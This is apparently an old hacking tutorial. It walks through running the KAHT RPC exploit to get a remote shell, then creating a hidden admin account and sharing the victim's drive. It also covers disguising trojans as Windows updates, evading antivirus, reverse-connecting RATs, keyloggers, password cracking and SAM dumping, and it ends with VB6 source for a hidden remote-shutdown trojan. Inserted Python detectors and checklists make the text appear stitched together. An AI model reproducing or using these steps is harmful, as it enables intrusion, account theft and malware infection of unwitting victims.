So you would like to know someone's PC name, the MAC address of their network card, or the username that is currently logged on to the PC? It can be very useful to have this info on someone. Their PC name can be their own name or a company name. Their MAC address is the address of their network card, which is static, meaning that it can never change. Their username can also be useful if you would like to know this person's name. All of this can only be retrieved if the person has a network card installed on their PC.

In DOS prompt (Start, Run) type in " nbtstat -a IP"

Example : nbtstat -a 196.35.24.15 will show something like this :

Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
PCNAME <00> UNIQUE Registered
DOMAINNAME<00> GROUP Registered
PCNAME<03> UNIQUE Registered
PCNAME<20> UNIQUE Registered
DOMAINNAME <1E> GROUP Registered
USERNAME <03> UNIQUE Registered

MAC Address = 00-22-AE-43-33-30

It will show you the PC name, the domain name if it is connected to a domain, and the user name logged on to the PC. The MAC is static, meaning it never changes, which is useful for identifying someone. Your buddy attacks you, you check his IP, you do an "nbtstat" on him, and you get his MAC address. So now if you check on his PC and see he has got the same MAC address, you know it was him attacking you.

Hacking a PC with a exploit

What is a exploit? It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there. Check this page for new exploits : http://www.frsirt.com/exploits/ or check the Windows Hacker exploit download page which has compiled exploits.

Now if your a n00b, you don't know how to compile an exploit, basically you need some programming experience, so go learn how to program. Most exploits are written in C++ so try Bloodshed Dev C++ which you can use to compile exploits.

Read this tutorial about compiling exploits.

But you can download exploits which other people has already compiled. If someone updates their PC when new exploits comes out, you can't exploit them. but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.

Check this example of how a exploit works:

KAHT II - MASSIVE RPC EXPLOIT

This is a exploit for Win2k/XP and its already compiled, you can download it from the Windows Hacker exploits section.

This is an explanation of how to use it :

1. Get target IP, make sure it uses XP or 2k

2. Download exploit tool
(make sure to deactivate your AV)

3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101

note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1

4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------

Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

5. NOW.. YOU ARE IN TARGET DRIVE

6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password

7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user

8. Sharing drive
C:\WINNT\system32>net share c=c:

9. Exit from target.. dont forget!
C:\WINNT\system32>exit

10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here

There you will now have a mapped drive to the target PC and an administrator account.
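From the defender's side, steps 6 to 8 above leave a recognizable trail: a new local account, that account added to Administrators, and a drive root shared, all within minutes of each other. The Python sketch below is an added example, not part of the original tutorial; the log format, the host names, the ten-minute window and the list of service parent processes are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records: time, host, parent process, command line.
SAMPLE_LOG = """\
2011-06-26T10:02:11 HOST-A explorer.exe cmd.exe /c dir
2011-06-26T10:14:03 HOST-B svchost.exe cmd.exe
2011-06-26T10:14:40 HOST-B cmd.exe net user myuser mypassword /add
2011-06-26T10:14:58 HOST-B cmd.exe net localgroup Administrators myuser /add
2011-06-26T10:15:20 HOST-B cmd.exe net share c=c:
2011-06-26T11:30:00 HOST-C cmd.exe net user helpdesk1 Temp#2011 /add
"""

WINDOW = timedelta(minutes=10)  # assumed correlation window
# Assumption: network-facing service hosts that should never start a shell.
SERVICE_PARENTS = {"svchost.exe", "inetinfo.exe", "services.exe"}

USER_ADD = re.compile(r"^net1?(?:\.exe)?\s+user\s+(\S+).*\s/add\b", re.I)
GROUP_ADD = re.compile(
    r"^net1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)
ROOT_SHARE = re.compile(r"^net1?(?:\.exe)?\s+share\s+(\S+?)=([a-z]:\\?)\s*$", re.I)


def parse(log):
    """Yield (time, host, parent, command line) for each well-formed record."""
    for line in log.splitlines():
        parts = line.split(None, 3)
        if len(parts) == 4:
            ts, host, parent, cmd = parts
            yield datetime.fromisoformat(ts), host, parent.lower(), cmd.strip()


def detect(log):
    """Return (host, rule, detail) findings in time order."""
    created = {}    # (host, user) -> time the account was created
    new_admin = {}  # host -> time of the latest new-local-admin finding
    findings = []
    for ts, host, parent, cmd in sorted(parse(log)):
        # A command shell whose parent is a service host, not a user session.
        if cmd.lower().split()[0] in ("cmd", "cmd.exe") and parent in SERVICE_PARENTS:
            findings.append((host, "shell-from-service", parent))
            continue
        m = USER_ADD.match(cmd)
        if m:
            created[(host, m.group(1).lower())] = ts
            findings.append((host, "account-created", m.group(1)))
            continue
        m = GROUP_ADD.match(cmd)
        if m:
            user = m.group(1)
            born = created.get((host, user.lower()))
            if born is not None and ts - born <= WINDOW:
                # Account created and promoted within minutes: high priority.
                new_admin[host] = ts
                findings.append((host, "new-local-admin", user))
            else:
                findings.append((host, "admin-group-change", user))
            continue
        m = ROOT_SHARE.match(cmd)
        if m:
            recent = host in new_admin and ts - new_admin[host] <= WINDOW
            rule = "root-share-after-new-admin" if recent else "drive-root-share"
            findings.append((host, rule, m.group(1) + "=" + m.group(2)))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

A single account creation, as on HOST-C, is routine administration; it is the correlated sequence on one host that deserves an immediate look.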

Hacking a PC through NetBios shares

Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printing enabled, so mostly computers with an network card. If you find a computer with a share, use Windows to connect to that share. Go START, RUN and type in "\\IP\sharename". Example "\\198.55.67.244\c" or with the PC name "\\pc1\c" - then you will have access to the share, to delete, copy or rename files or directories, depending what it was shared as, but most people share things with full access and no password. If you find a PC with shares, but when you try and connect to it, it ask you a password, the easy way to crack it is with PQWak, this program brute force cracks the password for you - Win9X only.

Windows NT/XP, works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions is given to an user name. But alot of people make shares with full access to anyone. Win2K/XP accessing an share like the C$ share will ask you an username and password, if there is no password specified by the person who's PC it is.. Trying username as Administrator and password blank. Most people got administrator account password blank, easy way to get onto their shares.

Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.

If you gain access to someone's hard drive, copy a trojan server file into their startup folder, and then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan.

Using a Trojan / RAT

Trojans is one of the first things you must learn when you want to hack. A trojan is a small program you send to someone to infect their PC so you can control their PC, steal passwords, files or just have some fun.

Every trojan works on a diffirent port, like Sub7, works on port 27374. If you scan a PC and find that port 27374 is open, it means the machine is infected with Sub7. Now ofcourse the trojan can be set with a password, its up to you to crack it then. Now remember that most trojans are picked up by Anti Virus software. You need a new released trojan which AV does not pick up.

The trojan most people know is Sub7 . Before you can start using the trojan, you first need a host to infected with a trojan. A host can be infected in a alot of ways. You can send the host the trojan server file, and tell them it's an game or a firewall or whatever you like it to be. Best is to rename the file to something they will think is usefull like : WindowsXP_update.exe. You can email them this file or put it on a downloads area on a web page, use your imagination. When sending a trojan through email, remember to ZIP or RAR the file, most email hosts do not allow you to send .exe files.

If you cannot get hold of a undetecable trojan, you can use a program like Pestil to make the trojan undetectable. I have tested Pestil with Biforst and it was not detected by NOD or AVG anti virus packages.

You can also bind the trojan file with another file, any executable file the trojan can be binded to. Always remember to rename the file, change the program icon and the put a password on the server file. Bind the file with another file and set the file to automatically delete itself after executed, or set it to give an system error.

When you infect a host or find a infected host, it's time to connect. Easy way to find trojans infect hosts is with Trojan hunter. Choose an IP range to scan through and it will search for trojan infected hosts. When you found an infected host, download the trojan client from my Trojans page.. Connect with the trojan to the host IP, to the certain port the trojan works on and you are ready to take control. Each trojan uses a diffident port. Here is a list of ports which a certain trojan works on.

With most trojans, you will be able to log keystrokes on a PC, even get logged into a file, and when the host is online it will email the keystrokes to an specified email address. Delete or copy files, reboot the PC, make screen captures or disable the screen or mouse. With Sub7 you can do anything on the infected host, just as if you where sitting in front of the PC itself.

Important thing to remember. A trojan comes with a file called "server.exe". Never run that file on your own PC, it will infect your PC with the trojan! Use the trojans configuration file to make changes to the "server.exe" file and then send the file to a victim.

There is also trojans which has the option to do a reverse connection. Very usefull if the person sits behind a router or firewall. After your infected the victims PC, the trojan will automaticly connects to you, thus getting past the problem of connecting through a router or firewall. Remember that if you do not connect to the Internet directly (with a modem) and you sit behind a router, you will need to forward the trojan ports in your routers configuration if you are doing a reverse connection.

Try out Bifrost RAT or Poison Ivy RAT which can do reverse connections, usefull when the host is behind a router.

Most of us do not have a static IP address, I recomend using a service like no-ip which gives you a name like hacker.no-ip.org which can be pinged from anywhere on the internet and it will give your current IP address. Set your reverse connection trojans to connect to this name.

Securing your Windows PC

Firstly install Win XP with the latest Service Pack. Run Windows Update (START, ALL PROGRAMS, WINDOWS UPDATE) and update Windows and all your device drivers. Download the latest versions of the applications you use, like an FTP server or proxy; old versions of programs are insecure and you could be hacked that way. Also try Autopatcher to update your Windows.

Disable the "guest" account on your PC and rename your "administrator" account. Right click My Computer and choose Manage.

Stop any services you don't use, but be careful not to stop something that you use ( RIGHT CLICK MY COMPUTER, CHOOSE MANAGE, SERVICES AND APPLICATIONS, SERVICES). Stop the MESSENGER and REMOTE REGISTRY services.

Delete the admin shares: share each one as something else and then stop sharing it. Then when you reboot it will not be shared automatically again. With these admin shares, domain admins and hackers can access your PC. Make sure to put a complex password on all your accounts.

Make your hard drive NTFS - it is the file system you format your hard drive with. Put a password on your BIOS and make sure you change the boot order to boot first from the hard drive, so someone cannot boot up with a CD, delete your SAM file or crack its password, and gain administrator access to your PC.

Make sure the built in firewall is enabled. Check in control panel for Windows firewall. This firewall may be the cause that some of your hacking applications and tools will stop working, so if you have a problem with an application make sure to add this program to your windows firewall exceptions.

Install some kind of anti virus program. Norton Anti Virus works well, but remember that a lot of hacking tools are picked up by anti virus, so disable your anti virus before running those tools.

Also install a spyware removal tool like Spyware Doctor.

Spyware is irritating software which is installed onto your PC through files you download from the net or web pages you open which have malicious code in them. It slows down your PC and might send your information to the spyware creator.
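Several items on this checklist can be verified from the command line rather than by clicking through the menus. The Python sketch below is an added example, not part of the original tutorial: it reads the text output of `net user guest`, `net share` and `sc query <service>` and reports which checklist items are still open. The sample outputs are constructed, and the fixed-width `net share` layout they use is an assumption.

```python
import re

def _row(name, resource, remark):
    # Assumed `net share` layout: fixed-width, left-aligned columns.
    return "%-13s%-32s%s" % (name, resource, remark)

# Constructed sample outputs, not captured from a real machine.
GUEST_OUT = "User name                    Guest\nAccount active               Yes\n"
SHARE_OUT = "\n".join([
    "",
    _row("Share name", "Resource", "Remark"),
    "",
    "-" * 79,
    _row("C$", "C:\\", "Default share"),
    _row("IPC$", "", "Remote IPC"),
    _row("ADMIN$", "C:\\WINDOWS", "Remote Admin"),
    _row("c", "C:\\", ""),
    _row("docs", "C:\\Docs", ""),
    "The command completed successfully.",
])
SERVICE_OUTS = {
    "Messenger": "SERVICE_NAME: Messenger\n        STATE              : 4  RUNNING\n",
    "RemoteRegistry": "SERVICE_NAME: RemoteRegistry\n        STATE              : 1  STOPPED\n",
}

ADMIN_SHARE = re.compile(r"^(?:[A-Z]|ADMIN)\$$", re.I)  # C$, D$, ADMIN$
DRIVE_ROOT = re.compile(r"^[A-Z]:\\?$", re.I)           # C: or C:\


def parse_shares(output):
    """Map share name -> resource, using the header to find column offsets."""
    lines = output.splitlines()
    header = next((l for l in lines if l.startswith("Share name")), None)
    if header is None:
        return {}
    res_at, rem_at = header.index("Resource"), header.index("Remark")
    shares, in_table = {}, False
    for line in lines:
        if line.startswith("---"):
            in_table = True
        elif in_table and line.strip() and not line.startswith("The command"):
            shares[line[:res_at].strip()] = line[res_at:rem_at].strip()
    return shares


def audit(guest_out, share_out, service_outs):
    """Return the checklist items that are still open, as short labels."""
    findings = []
    if re.search(r"^Account active\s+Yes\s*$", guest_out, re.M | re.I):
        findings.append("guest-enabled")
    for name, resource in parse_shares(share_out).items():
        if ADMIN_SHARE.match(name):
            findings.append("admin-share:" + name)
        elif not name.endswith("$") and DRIVE_ROOT.match(resource):
            # A visible share of a whole drive exposes every file on it.
            findings.append("drive-root-share:" + name)
    for service, out in service_outs.items():
        m = re.search(r"^\s*STATE\s*:\s*\d+\s+(\w+)", out, re.M)
        if m and m.group(1) != "STOPPED":
            findings.append("service-running:" + service)
    return findings


if __name__ == "__main__":
    for item in audit(GUEST_OUT, SHARE_OUT, SERVICE_OUTS):
        print(item)
```

IPC$ is deliberately not reported: it is the remote IPC endpoint rather than a drive share, so the share check only covers the drive-letter and ADMIN$ shares.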

Frequently asked questions

How do I hack? - There is no easy way how to hack. Google is your best friend.. REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websites. Learn a programming language like C++. Get a book like Hacking for Dummies which will teach you alot.

What do I need to be able to hack? - Firstly you need to understand how your computer's operating system works, how networks and protocols work, security settings and general PC knowledge. After you understand how it works you need hacking tools which help you to hack.

What is command prompt (cmd- the little dos Windows)? - Go START, RUN and type in: "cmd"

What can I do in cmd? - You can do various things with it, like run exploits or do a ping request.

Why do some of the hacking tools I download just close themselves when I open them? - Lots of hacking tools are DOS based and have to be run through CMD. If you double click on the program it will open a DOS box and automatically close the box. From CMD you can navigate to the directory in which your hacking tool is stored and run it from there. Other hacking tools are GUI ( graphical user interface ) based and will open like a normal Windows program.

What is an IP address? - Every computer connected to the Internet or some network has an IP address. Go to START, RUN and type in "cmd", then type in "ipconfig"; it will show you your IP address or addresses. It will look something like this : 81.35.99.84. IP = internet protocol.

How do I find someone's IP adress? - Look further down in this tutorial and use IPSTEALER

What can I do with a IP? - Well you need someone's IP before you can hack, portscan or DOS them.

What is IP ping ? - It's a command you can use to check if someone's IP address is online, to check if they are connected to the Internet or a network. In command prompt type in "ping 192.168.0.21" - this will show you something like this :

Pinging 192.168.0.21 with 32 bytes of data:

Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.0.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

That means you can successfully PING IP 192.168.0.21, which means the IP is online. If you get a message "request timed out" it means the IP is not online.

Bytes=32 is the amount of data which was sent to the host.

Time<1ms is the time the host took to reply.

Now remember that even though you cannot ping a IP, it does not mean the host is not online, ping requests might just be blocked.

Why can't I ping a certain IP? - Either the IP is not online/in use, or the person you're trying to ping is running a firewall which blocks ping requests, or maybe your firewall is blocking outgoing ping requests.

What is 127.0.0.1 IP? - It is your PC's local loopback IP address.

Why do I have two IP addresses when I do an ipconfig? - Well, if you're on a local LAN (local area network) you will have an IP like 192.168.0.1. If you're also connected to the Internet you will have another IP address like 80.87.34.56. 192.168.0.1 is your local IP, which you use to communicate with your local network (LAN), and 80.87.34.56 is your Internet IP.

What is a static and dynamic IP address? - Static means a permanently set IP address - like a website will have a static IP address, it never changes. Dynamic means a temporary IP address - dialing up to the Internet with a modem or most ADSL connections have dynamic IPs. Every time you log on to the Internet your ISP ( Internet Service Provider ) will issue you a new IP address.

I have sent someone a trojan but I cannot connect to their PC? - Either they are running a firewall which blocks you from connecting to their PC, or they are connected to the internet through a router.

What do I do when someone is behind a router and I want to control their PC with a trojan? - You will need to use a trojan which uses reverse connections - meaning you don't connect to the host, the host connects to you. Bifrost is a trojan which has the mentioned function. Remember when someone is behind a router and your using IPstealer to get hold of their IP address, you are actually getting their routers IP, not their actual PC's IP. The router will have the persons internet IP (WAN IP) and their PC will have a difirent IP - their LAN IP.

How do I check if my own PC is infected with a trojan? - Do a port scan on your PC and check which ports are open. If you find any open ports in this trojan port list you might be infected with a trojan. Download the trojan you think you might be infected with and connect to that specified port.

What is a router? - A device which is used to route data on a network. A router decides where certain traffic should be sent to.

What is a firewall? - It's a software or hardware device which can block or permit certain ports or IPs or certain kinds of data.

What is a port and what can I do with it? - Every program running on your PC which has some network function uses a specific port to send and receive data through. If you do a port scan you will see which ports are open on the host you scanned. Port 80 is normally a web server, port 21 an FTP server, etc. Trojans also use ports. Check this list of trojan ports; if you find an open port in this list, the host might be infected with a trojan, download the trojan and try connecting to the port.

How do I do a port scan? - You need a program like superscan to do a portscan. Then all you do is add the ip you want to scan.

Why do you want to scan ports? - If you scan a PC with a port scanner, it will show you which programs or services are running on the PC.

Common ports:

Ping : 7
Systat : 11
Time : 13
NetStat : 15
SSH : 22
Telnet : 23
SMTP : 25
Whois : 43
Finger : 79
HTTP : 80
POP : 110

What is an exploit? - It's a poorly coded part of some software which you can use to gain access to the system. There are many exploits available for the various versions of MS Windows out there.

How do I use a exploit? - You first need to compile the exploit with a program like Bloodshed C++ compiler. Then you can start the exploit through command prompt and see if the system your trying to exploit is vulnerable to that specific exploit. Scroll down for more information about exploits.

What is an exploit POC? - POC stands for proof of concept, and it is the proof that an exploit works.

What is a DOS attack? - It is when too much data is being sent to a host and it cannot handle all the data and disconnects from the Internet.

How do I see what connections are currently made to my PC? - In cmd type in "netstat" - it will show you the IP addresses of connections to your PC and what ports they are using. You can also use Currports, which has a GUI to show current connections and has an option to close the connection on a certain port.
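The netstat answer above and the earlier "How do I check if my own PC is infected with a trojan?" answer describe the same self-check: compare the sockets on your own PC against the ports associated with backdoors. The Python sketch below is an added example, not part of the original tutorial; the `netstat -an` sample is constructed, and the watched ports are only the ones this page itself mentions.

```python
from collections import namedtuple

# Ports this page associates with backdoors. A match is a lead, not proof:
# any program may bind these numbers, and a reverse-connection trojan of the
# kind the page describes never shows up as a listener at all.
WATCHED = {
    27374: "Sub7 port named on this page",
    2999: "listener port of the VB6 sample on this page",
    6969: "trojan port in the IISHack usage example",
    36388: "remote shell port in the KAHT sample output",
}

# Constructed `netstat -an` output in the Windows layout.
SAMPLE = """\

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:27374          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:2999         0.0.0.0:0              LISTENING
  TCP    192.168.0.21:139       0.0.0.0:0              LISTENING
  TCP    192.168.0.21:27374     80.87.34.56:1188       ESTABLISHED
  TCP    192.168.0.21:1045      81.35.99.84:80         ESTABLISHED
  TCP    [::]:445               [::]:0                 LISTENING
  UDP    0.0.0.0:2999           *:*
"""

Socket = namedtuple("Socket", "proto host port peer state")


def split_endpoint(text):
    """Split 'host:port', including bracketed IPv6 hosts and '*:*'."""
    host, _, port = text.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def parse_netstat(output):
    rows = []
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue  # banner, column header and blank lines
        host, port = split_endpoint(fields[1])
        state = fields[3] if len(fields) > 3 else ""  # UDP rows have no state
        rows.append(Socket(fields[0], host, port, fields[2], state))
    return rows


def scope(host):
    """Say how widely a listening socket is reachable."""
    if host in ("0.0.0.0", "::"):
        return "all interfaces"
    if host.startswith("127.") or host == "::1":
        return "loopback only"
    return "one interface"


def review(output, watched=WATCHED):
    """Return (kind, local endpoint, detail) for TCP sockets on watched ports."""
    findings = []
    for s in parse_netstat(output):
        # The watched ports are TCP services; a UDP socket with the same
        # number is a different service and is not reported.
        if s.proto != "TCP" or s.port not in watched:
            continue
        local = "%s:%d" % (s.host, s.port)
        if s.state == "LISTENING":
            findings.append(("listening", local, scope(s.host)))
        elif s.state == "ESTABLISHED":
            findings.append(("session", local, s.peer))
    return findings


if __name__ == "__main__":
    for kind, local, detail in review(SAMPLE):
        print(kind, local, detail)
```

A "session" finding means something is connected to the watched port right now, which makes it more urgent than a bare listener.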

What is a MAC address? - It's a hard coded number, almost like a name, which is embedded into a network card. It identifies the manufacturer of the card and a unique number for the card. No two network cards in the world have the same MAC address.

How do I find out my own or someone else's MAC address? -

Your own MAC = Goto cmd and type in "ipconfig /all"

MAC address looks something like this : 00-13-20-A3-0B-4C

For someone else's MAC address you need their IP address; then go to cmd and type in "nbtstat -a 192.168.0.5" or whatever IP they use. This will show you their MAC address as well as their currently logged on user.

What is the Windows Registry and how do I access it? - It's where Windows stores most of the configuration of your operating system and most installed programs. You might use it to make a trojan server file you uploaded to the PC run automatically when Windows starts up. To access the registry go START, RUN and type in "regedit"

Be careful what you change in the registry, it might screw up your PC. First make a backup of the registry.

How do I hack a webpage/ web server? - Read the IIS hacking tutorial in the MISC download section on Windows Hacker. Remember not all webservers run IIS!

What is IIS? - It is Microsoft's web server. IIS - Internet information server. Most webservers run on port 80.

How do I check if a website is running on IIS? - Telnet to the website URL through CMD - "telnet www.siteyouwanttocheck.com 80"

What is telnet? - Program which can be used to connect to remote computers or routers and to run commands by simply typing them in its window.

How do I hack into a Gmail, Yahoo or Hotmail email account? - Every now and then someone discovers a way to get into those email servers, but the service provider fixes the security hole so fast, there is no straight answer for that. Best way is to install a keylogger on the victims PC and get their login details. Otherwise download THIS program which you can use to brute force a hotmail account.

How do I hack into a POP3 email account? - Hydra 5.3 is a program which you can use to crack POP3 accounts. You will need a wordlist which Hydra will use to crack the POP3 password.

What is a keylogger? - It is a program you install on someone's PC which captures every key that is pressed on their keyboard which is emailed to you or stored into a file.

How do I get the administrator account password while logged in to the PC? - Locally run a program like Adminhack for local administrator account cracking. If you need to do it remotely run a program like Venom or Starbrute.

What is a SAM file? - SAM file is the file which stores all the user accounts and their password hashes like the Administrator account. SAM file is stored in "C:\WINDOWS\system32\config" but it is locked and inaccessable while you are busy using Windows - meaning you can't copy it while your in Windows. You need to boot up with another operating system like NTFSDOS or Linux with NTFS support. When you copied the SAM file you can crack the passwords stored in the SAM file with a program like LC5. With Pwdump6 it is possible to get access to the SAM file while logged into windows. It can also connect to a remote PC and grab the password hashes from the SAM file. Administrator account is needed. Ophcrack live CD uses rainbow tables to crack user account password, and it boots from a CD.

How do I reset a administrator or some other account password on Win2K/WinXP/WinNT/Win2003? - Download Offline NT Password & Registry Editor which you can use to create a bootup disk or CD and then boot up the PC and then you can reset the password. Just remember that this program will not show you the password, you can only change the password.

How do I crack a administrator password? - If you need to crack a administrator password you will need to copy the SAM file to another machine and crack it. Download this NTXP-Cracker program which has included everything you need to boot up the PC, copy the SAM file and crack the SAM file on another machine.

How do I find out what operating system does my target run? - Download Detect and use it against your targets IP address.

Result:

C:\>detect.exe 127.0.0.1
[*]------------------------------[*]
[*] XP/2K OS Detector [*]
[*] by: illwill & phr0stic [*]
[*]------------------------------[*]

[+] Finding Host 127.0.0.1
[+] Connected to 127.0.0.1
[+] Bytes Sent: 222
[?] The box seems to be Windows XP

write a simple trojan in vb6



Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code.
The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go
through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it.
To do this you start by using

Private Sub Form_Load()
Me.Visible = False
End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier.
So to get our application hidden from that a little better we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub

(Due to Bill gates, all running exe's will be displayed in the list of running processes. Your app will be hidden in the Running Applications List though )

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this
tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control.
I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat.

Then we add this code to our main form:

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. (Public so it can be used by code outside of the Module) So add this code to the module and we are about done with the server
of the Trojan!

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

Ok now we have a program that when the data “Msgbox” is sent to it on port 2999 it will display a msgbox on the victims computer. When the data "shutdown" is sent to it on port 2999 it will shutdown the computer. I used a Select Case statement so it is easy to modify this code to your own needs later on.

Congradulations! You just made your first Trojan. Lets go over the complete code now.

Main Form

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.

Module

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client is what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the commands "shutdown" and "msgbox", let's make a client that sends the commands "shutdown" and "msgbox".

Make a form and add a Winsock control, a text box, and 4 buttons. The text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdMsgbox, cmdShutdown, and cmdDisconnect. Now let's look at the code we would use to make our client.

Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub

Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub

Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub

That is the code for the client. All it does is get the IP address from txtIp and connect to it on remote port 2999. Then, when connected, you can send the "shutdown" or "msgbox" data to the server and the respective actions will be carried out (shut down the computer or display a message box).

These two programs do very little but can quickly evolve into a powerful remote administration tool if you know what you are doing. I suggest trying
to add different types of error handling and functions to both the server and client.

Ideas:

Make the server able to download a file specified by the attacker

Add code to make the server be executed at startup. (It's a registry key)

Add a keylogger to the server - make it send the log to the attacker. There are loads more things you could do, just use your imagination
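A defender's view of the server described above, as an added example that is not part of the original post: hiding the form and the task-list entry does not hide the socket, so parsing `netstat -ano` output against an allowlist of expected service ports surfaces it in both its idle and connected states. The sample output, PIDs, addresses, allowlist and the ephemeral-port heuristic are assumptions constructed for illustration.

```python
import re

# Constructed `netstat -ano` snapshots (not from a real host). IDLE is the
# server waiting on port 2999; CONNECTED is after a client attaches: the page's
# server calls win.Close before win.Accept, so its LISTENING row is gone.
HEADER = "  Proto  Local Address      Foreign Address    State        PID\n"
IDLE = HEADER + """\
  TCP    0.0.0.0:135        0.0.0.0:0          LISTENING    884
  TCP    0.0.0.0:445        0.0.0.0:0          LISTENING    4
  TCP    0.0.0.0:2999       0.0.0.0:0          LISTENING    3120
  TCP    [::]:135           [::]:0             LISTENING    884
  UDP    0.0.0.0:5353       *:*                             1500
"""
CONNECTED = HEADER + """\
  TCP    0.0.0.0:135        0.0.0.0:0          LISTENING    884
  TCP    192.168.1.20:2999  192.168.1.77:9999  ESTABLISHED  3120
  TCP    192.168.1.20:49712 203.0.113.10:443   ESTABLISHED  2216
"""

ALLOWED_PORTS = {135, 445}   # assumed baseline of expected service ports
EPHEMERAL_START = 49152      # assumed: default Windows dynamic range (Vista+)
ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+([A-Z_0-9]+)\s+(\d+)\s*$")

def parse_tcp_rows(text):
    """Return (local_addr, local_port, remote, state, pid) for each TCP row."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            laddr, lport, raddr, rport, state, pid = m.groups()
            rows.append((laddr, int(lport), f"{raddr}:{rport}", state, int(pid)))
    return rows

def suspicious_sockets(text, allowed=ALLOWED_PORTS):
    """Flag TCP sockets bound to a service port that is not on the allowlist."""
    findings = []
    for _laddr, lport, remote, state, pid in parse_tcp_rows(text):
        if lport in allowed:
            continue
        listening = state == "LISTENING"
        # An ESTABLISHED row on a low local port is treated as an accepted
        # inbound session (heuristic: outbound connections use ephemeral ports).
        inbound = state == "ESTABLISHED" and lport < EPHEMERAL_START
        if listening or inbound:
            findings.append({"port": lport, "pid": pid, "state": state,
                             "peer": None if listening else remote})
    return findings
```

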